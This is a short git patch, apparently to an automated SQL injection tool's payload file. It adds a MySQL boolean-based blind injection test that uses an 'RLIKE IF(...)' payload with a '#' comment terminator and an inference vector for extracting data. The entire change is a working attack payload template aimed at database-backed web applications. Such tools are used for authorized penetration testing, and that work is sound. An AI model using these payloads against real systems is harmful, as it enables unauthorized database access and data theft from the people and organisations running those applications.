From d6d8d54eda12bdd9f63acab6ce061c6c700a33f2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 22 Jan 2011 00:06:27 +0000
Subject: [PATCH] implemented Johannes Dahse / Reiners' technique

---
 xml/payloads.xml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index ba0fb9e0a..b6adbf466 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -552,6 +552,26 @@ Formats:
             <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
         </response>
     </test>
+
+    <test>
+        <title>MySQL boolean-based blind - WHERE or HAVING clause (RLIKE - comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>RLIKE IF([INFERENCE],[ORIGVALUE],0x28)</vector>
+        <request>
+            <payload>RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28)</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
     <!-- End of boolean-based blind tests - WHERE or HAVING clause -->